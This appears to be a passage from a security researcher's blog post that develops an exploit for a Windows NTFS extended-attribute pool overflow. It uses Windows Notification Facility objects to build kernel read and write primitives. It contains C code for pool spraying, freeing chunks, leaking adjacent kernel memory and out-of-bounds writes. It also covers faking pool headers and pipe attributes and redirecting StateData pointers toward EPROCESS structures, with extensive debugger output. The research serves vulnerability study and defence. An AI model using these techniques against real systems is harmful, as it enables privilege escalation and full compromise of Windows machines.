 ffffbe0f623d7e00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ec0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ef0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7fb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080

This is useful for filling the pool with allocations of both a controlled size and controlled data, so we continue our investigation of the WNF feature.

Controlled Free

The next thing which would be useful from an exploit perspective would be the ability to free WNF chunks on demand within the paged pool.

There’s also an API call which does this, NtDeleteWnfStateData, which calls into ExpWnfDeleteStateData and in turn ends up freeing our allocation.

Whilst researching this area, I was able to reuse the freed chunk straight away with a new allocation. More investigation is needed to determine whether the LFH makes use of delayed free lists; in my case, from empirical testing, I did not seem to be hitting this after a large spray of Wnf chunks.
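
As a hedged sketch (the NtDeleteWnfStateData prototype is an assumption from public research, and the hole-punching pattern shown is just one possible use), chunks from the earlier spray can be freed on demand, for example to punch controlled-size holes for the vulnerable NTFS allocation to land in:

#include <windows.h>
#include <winternl.h>

typedef NTSTATUS (NTAPI *NtDeleteWnfStateData_t)(ULONG64 *StateName, const VOID *ExplicitScope);

/* state_names / count refer to the array populated by the spray sketch earlier. */
void punch_holes(ULONG64 *state_names, int count)
{
    NtDeleteWnfStateData_t pNtDeleteWnfStateData =
        (NtDeleteWnfStateData_t)GetProcAddress(GetModuleHandleA("ntdll.dll"),
                                               "NtDeleteWnfStateData");
    for (int i = 0; i < count; i += 2)      /* free every other chunk */
        pNtDeleteWnfStateData(&state_names[i], NULL);
}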

Relative Memory Read

Now we have the ability to perform both a controlled allocation and free, but what about the data itself, and can we do anything useful with it?

Well, looking back at the structure, you may well have spotted that the AllocatedSize and DataSize are contained within it:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

The DataSize denotes the size of the actual data following the structure within memory and is used for bounds checking within the NtQueryWnfStateData function. The actual memory copy operation takes place in the function ExpWnfReadStateData:

So the obvious thing here is that if we can corrupt DataSize then this will give relative kernel memory disclosure.

I say relative because the _WNF_STATE_DATA structure is pointed at by the StateData pointer of the _WNF_NAME_INSTANCE which it is associated with:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Having this relative read now allows disclosure of other adjacent objects within the pool. Some output as an example from my code:

found corrupted element changeTimestamp 54545454 at index 4972
len is 0xff
41 41 41 41 42 42 42 42  43 43 43 43 44 44 44 44  |  AAAABBBBCCCCDDDD
00 00 03 0B 57 6E 66 20  E0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  D0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  80 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 03 4E 74 66 30  70 76 6B D8 F9 97 D9 42  |  ....Ntf0pvk....B
60 D6 55 AA 85 B4 FF FF  01 00 00 00 00 00 00 00  |  `.U.............
7D B0 29 01 00 00 00 00  41 41 41 41 41 41 41 41  |  }.).....AAAAAAAA
00 00 03 0B 57 6E 66 20  20 76 6B D8 F9 97 D9 42  |  ....Wnf  vk....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41     |  AAAAAAAAAAAAAAA

At this point there are many interesting things which can be leaked out, especially considering that both the vulnerable NTFS chunk and the WNF chunk can be positioned next to other interesting objects. Items such as the ProcessBilled field can also be leaked using this technique.

We can also use the ChangeStamp value to determine which of our objects is corrupted when spraying the pool with _WNF_STATE_DATA objects.
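
A hedged sketch of this search is below: each sprayed state name is queried back via NtQueryWnfStateData (prototype assumed from public research), and the element whose ChangeStamp now matches the marker written by the overflow (0x54545454 in the output above) is the corrupted one; its inflated DataSize then yields the out-of-bounds read into the supplied buffer.

#include <windows.h>
#include <winternl.h>
#include <stdio.h>

typedef NTSTATUS (NTAPI *NtQueryWnfStateData_t)(ULONG64 *StateName, PVOID TypeId,
    const VOID *ExplicitScope, PULONG ChangeStamp, PVOID Buffer, PULONG BufferSize);

/* state_names / count refer to the array populated by the spray sketch earlier. */
int find_corrupted(ULONG64 *state_names, int count, UCHAR *leak, ULONG leak_size)
{
    NtQueryWnfStateData_t pNtQueryWnfStateData =
        (NtQueryWnfStateData_t)GetProcAddress(GetModuleHandleA("ntdll.dll"),
                                              "NtQueryWnfStateData");
    for (int i = 0; i < count; i++) {
        ULONG change_stamp = 0;
        ULONG size = leak_size;
        pNtQueryWnfStateData(&state_names[i], NULL, NULL, &change_stamp, leak, &size);
        if (change_stamp == 0x54545454) {   /* marker placed in the NTFS overflow data */
            printf("found corrupted element changeTimestamp %x at index %d, len 0x%x\n",
                   change_stamp, i, size);
            return i;                       /* leak now holds adjacent paged pool memory */
        }
    }
    return -1;
}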

Relative Memory Write

So what about writing data outside the bounds?

Taking a look at the NtUpdateWnfStateData function, we end up with an interesting call: ExpWnfWriteStateData((__int64)nameInstance, InputBuffer, Length, MatchingChangeStamp, CheckStamp);. Below shows some of the contents of the ExpWnfWriteStateData function:

We can see that if we corrupt the AllocatedSize, represented by v12[1] in the code above, so that it is bigger than the actual size of the data, then the existing allocation will be used and a memcpy operation will corrupt further memory.

So at this point it’s worth noting that the relative write has not really given us anything more than we already had with the NTFS overflow. However, as the data can be both read and written back using this technique, it opens up the ability to read data, modify certain parts of it, and write it back.
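
A corresponding hedged sketch for the write direction (again using the assumed NtUpdateWnfStateData prototype): once the corrupted element has been located and its AllocatedSize inflated, writing a larger Length back through the same state name reuses the undersized allocation and the kernel memcpy runs past the end of the real chunk.

#include <windows.h>
#include <winternl.h>

typedef NTSTATUS (NTAPI *NtUpdateWnfStateData_t)(ULONG64 *StateName, const VOID *Buffer,
    ULONG Length, PVOID TypeId, const VOID *ExplicitScope, ULONG MatchingChangeStamp,
    ULONG CheckStamp);

/* length exceeds the chunk's real size but stays within the faked AllocatedSize. */
void relative_write(ULONG64 *corrupted_state, const UCHAR *data, ULONG length)
{
    NtUpdateWnfStateData_t pNtUpdateWnfStateData =
        (NtUpdateWnfStateData_t)GetProcAddress(GetModuleHandleA("ntdll.dll"),
                                               "NtUpdateWnfStateData");
    pNtUpdateWnfStateData(corrupted_state, data, length, NULL, NULL, 0, 0);
}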

_POOL_HEADER BlockSize Corruption to Arbitrary Read using Pipe Attributes

As mentioned previously, when I first started investigating this vulnerability, I was under the impression that the pool chunk needed to be very small in order to trigger the underflow, and this wrong assumption led me to try to pivot to pool chunks of a more interesting variety. By default, within the 0x30 chunk segment alone, I could not find any interesting objects which could be used to achieve arbitrary read.

Therefore my approach was to use the NTFS overflow to corrupt the BlockSize within the _POOL_HEADER of an adjacent 0x30-sized WNF chunk.

nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

By ensuring that the PoolQuota bit of the PoolType is not set, we can avoid any integrity checks for when the chunk is freed.

By setting the BlockSize to a different size, once the chunk is freed using our controlled free, we can force the chunk’s address to be stored within the wrong lookaside list for its size.

Then we can allocate another object whose size matches the one written into the corrupted header; the allocation will be served from that lookaside list and will take the place of this chunk.

Finally, we can then trigger corruption again and therefore corrupt our more interesting object.
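
The overflow data used to corrupt the neighbouring header can be sketched roughly as below (a speculative illustration only: the field layout mirrors the dt output above, the 0x10-byte BlockSize granularity is assumed, and the values shown target the 0x30 to 0x220 resize described here).

#include <string.h>

#pragma pack(push, 1)
typedef struct fake_pool_header {       /* byte layout of _POOL_HEADER as shown above */
    unsigned char      PreviousSize;
    unsigned char      PoolIndex;
    unsigned char      BlockSize;       /* in 0x10-byte units */
    unsigned char      PoolType;
    unsigned int       PoolTag;
    unsigned long long ProcessBilled;
} fake_pool_header_t;
#pragma pack(pop)

void build_fake_header(unsigned char *overflow_data)
{
    fake_pool_header_t hdr = { 0 };
    hdr.BlockSize = 0x22;               /* 0x220 / 0x10: lie about the chunk's size */
    hdr.PoolType  = 0x03;               /* unchanged, with the PoolQuota bit left clear */
    hdr.PoolTag   = 0x20666E57;         /* 'Wnf ' */
    memcpy(overflow_data, &hdr, sizeof(hdr));
}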

Initially I demonstrated this being possible using another WNF chunk of size 0x220:

1: kd> !pool @rax
Pool page ffff9a82c1cd4a30 region is Paged pool
 ffff9a82c1cd4000 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4030 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4060 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4090 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4120 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4150 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4180 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4210 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4240 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4270 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4300 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4330 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4360 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4390 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4420 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4450 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4480 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4510 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4540 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4570 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4600 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4630 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4660 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4690 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4720 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4750 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4780 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4810 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4840 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4870 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4900 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4930 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4960 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4990 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49f0 size:   30 previous size:    0  (Free)       NtFE
*ffff9a82c1cd4a20 size:  220 previous size:    0  (Allocated) *Wnf  Process: ffff8608b72bf080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffff9a82c1cd4c30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080

However, the main thing here is the ability to find a more interesting object to corrupt. As a quick win, the PipeAttribute object from the great paper https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf was also used.

typedef struct pipe_attribute {
    LIST_ENTRY list;
    char* AttributeName;
    size_t ValueSize;
    char* AttributeValue;
    char data[0];
} pipe_attribute_t;

As PipeAttribute chunks are also of a controllable size and allocated on the paged pool, it is possible to place one adjacent to either a vulnerable NTFS chunk or a WNF chunk which allows relative writes.

Using this layout we can corrupt the PipeAttribute‘s Flink pointer and point this back to a fake pipe attribute as described in the paper above. Please refer back to that paper for more detailed information on the technique.

Diagrammatically we end up with the following memory layout for the arbitrary read part:

Whilst this worked and provided a nice reliable arbitrary read primitive, the original aim was to explore WNF more to determine how an attacker may have leveraged it.

The journey to arbitrary write

After taking a step back from this minor PipeAttribute detour, and with the realisation that I could actually control the size of the vulnerable NTFS chunks, I started to investigate whether it was possible to corrupt the StateData pointer of a _WNF_NAME_INSTANCE structure. So long as the DataSize and AllocatedSize could be aligned to sane values in the target area in which the overwrite was to occur, the bounds checking within ExpWnfWriteStateData would pass.

Looking at the creation of the _WNF_NAME_INSTANCE we can see that it will be of size 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. This ends up being put into a chunk of 0xC0 within the segment pool:

So the aim is to have the following occurring:

We can perform a spray as before using any size of _WNF_STATE_DATA which will lead to a _WNF_NAME_INSTANCE instance being allocated for each _WNF_STATE_DATA created.

Therefore we can end up with our desired memory layout, with a _WNF_NAME_INSTANCE adjacent to our overflowing NTFS chunk, as follows:

 ffffdd09b35c8010 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c80d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8190 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
*ffffdd09b35c8250 size:   c0 previous size:    0  (Allocated) *NtFE
        Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffffdd09b35c8310 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080       
 ffffdd09b35c83d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8490 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8550 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8610 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c86d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8790 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8850 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8910 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c89d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8a90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8b50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8c10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8cd0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8d90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8e50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8f10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080

We can see before the corruption the following structure values:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0xffffdd09`ad45d4a0 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffffdd09`b35b3e10 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

Then after our NTFS extended attributes overflow has occurred and we have overwritten a number of fields:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0x61616161`62626262 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffff8d87`686c8088 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

For example, the StateData pointer has been modified to hold the address of an EPROCESS structure:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 ((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)
((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)                 : 0xffff8d87686c8088 [Type: _WNF_STATE_DATA *]
    [+0x000] Header           [Type: _WNF_NODE_HEADER]
    [+0x004] AllocatedSize    : 0xffff8d87 [Type: unsigned long]
    [+0x008] DataSize         : 0x686c8088 [Type: unsigned long]
    [+0x00c] ChangeStamp      : 0xffff8d87 [Type: unsigned long]


PROCESS ffff8d87686c8080
    SessionId: 1  Cid: 1760    Peb: 100371000  ParentCid: 1210
    DirBase: 873d5000  ObjectTable: ffffdd09b2999380  HandleCount:  46.
    Image: TestEAOverflow.exe

I also made use of CVE-2021-31955 as a quick way to get hold of an EPROCESS address, as this was used within the in-the-wild exploit. However, with the primitives and flexibility of this overflow, it is expected that this would likely not be needed and that this could also be exploited at low integrity.

There are still some challenges here though, and it is not as simple as just overwriting the StateName with a value which you would like to look up.

StateName Corruption

For a successful lookup, the internal StateName of the corrupted _WNF_NAME_INSTANCE needs to correspond to the external StateName being queried.

At this stage it is worth going into the StateName lookup process in more depth.

As mentioned within Playing with the Windows Notification Facility, each _WNF_NAME_INSTANCE is sorted and put into an AVL tree based on its StateName.

There is the external version of the StateName which is the internal version of the StateName XOR’d with 0x41C64E6DA3BC0074.

For example, the external StateName value 0x41c64e6da36d9945 would become the following internally:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 (*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))
(*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))                 [Type: _WNF_STATE_NAME_STRUCT]
    [+0x000 ( 3: 0)] Version          : 0x1 [Type: unsigned __int64]
    [+0x000 ( 5: 4)] NameLifetime     : 0x3 [Type: unsigned __int64]
    [+0x000 ( 9: 6)] DataScope        : 0x4 [Type: unsigned __int64]
    [+0x000 (10:10)] PermanentData    : 0x0 [Type: unsigned __int64]
    [+0x000 (63:11)] Sequence         : 0x1a33 [Type: unsigned __int64]
1: kd> dc 0xffffdd09b35c8348
ffffdd09`b35c8348  00d19931

Or in bitwise operations:

Version = InternalName & 0xf
LifeTime = (InternalName >> 4) & 0x3
DataScope = (InternalName >> 6) & 0xf
IsPermanent = (InternalName >> 0xa) & 0x1
Sequence = InternalName >> 0xb
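
A small standalone helper illustrating the conversion (the XOR constant and bit layout come from the text above and prior public WNF research; the example external value is the one shown earlier):

#include <stdint.h>
#include <stdio.h>

#define WNF_STATE_KEY 0x41C64E6DA3BC0074ULL

int main(void)
{
    uint64_t external = 0x41C64E6DA36D9945ULL;        /* example external StateName from above */
    uint64_t internal = external ^ WNF_STATE_KEY;      /* 0x00D19931 for this example */

    printf("internal    = 0x%llx\n", (unsigned long long)internal);
    printf("Version     = 0x%llx\n", (unsigned long long)(internal & 0xf));
    printf("LifeTime    = 0x%llx\n", (unsigned long long)((internal >> 4) & 0x3));
    printf("DataScope   = 0x%llx\n", (unsigned long long)((internal >> 6) & 0xf));
    printf("IsPermanent = 0x%llx\n", (unsigned long long)((internal >> 0xa) & 0x1));
    printf("Sequence    = 0x%llx\n", (unsigned long long)(internal >> 0xb));   /* 0x1a33 */
    return 0;
}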

The key thing to realise here is that whilst Version, LifeTime and DataScope are controlled, the Sequence number for WnfTemporaryStateName state names is stored in a global.

As you can see from the below, based on the DataScope either the current server Silo Globals or the Server Silo Globals are offset into in order to obtain v10, and this is then used as the Sequence, which is incremented by 1 each time.

Then, in order to look up a name instance, the following code path is taken:

i[3] in this case is actually the StateName of a _WNF_NAME_INSTANCE structure, as this is outside of the _RTL_BALANCED_NODE rooted off the NameSet member of a _WNF_SCOPE_INSTANCE structure.

Each of the _WNF_NAME_INSTANCE structures is joined to the others via the TreeLinks element. Therefore the tree traversal code above walks the AVL tree and uses it to find the correct StateName.

One challenge from a memory corruption perspective is that whilst you can determine the external and internal StateNames of the objects which have been heap sprayed, you don’t necessarily know which of the objects will be adjacent to the NTFS chunk which is being overflowed.

However, with careful crafting of the pool overflow, we can guess the appropriate value to set the _WNF_NAME_INSTANCE structure’s StateName to be.

It is also possible to construct your own AVL tree by corrupting the TreeLinks pointers; however, the main caveat with that is that care needs to be taken to avoid triggering safe unlinking protection.

As we can see from Windows Mitigations, Microsoft has implemented a significant number of mitigations to make heap and pool exploitation more difficult.

In a future blog post I will discuss in depth how this affects this specific exploit and what clean-up is necessary.

Security Descriptor

One other challenge I ran into whilst developing this exploit was due to the security descriptor.

Initially I set this to be the address of a security descriptor within userland, which was used in NtCreateWnfStateName.

Performing some comparisons between an unmodified security descriptor within kernel space and the one in userspace demonstrated that these were different.

Kernel space:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)                 : 0xffff9e8253eca5a0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0x800c [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x28000200000014 [Type: void *]
    [+0x018] Sacl             : 0x14000000000001 [Type: _ACL *]
    [+0x020] Dacl             : 0x101001f0013 [Type: _ACL *]

After repointing the security descriptor to the userland structure:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)                 : 0x23ee3ab6ea0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
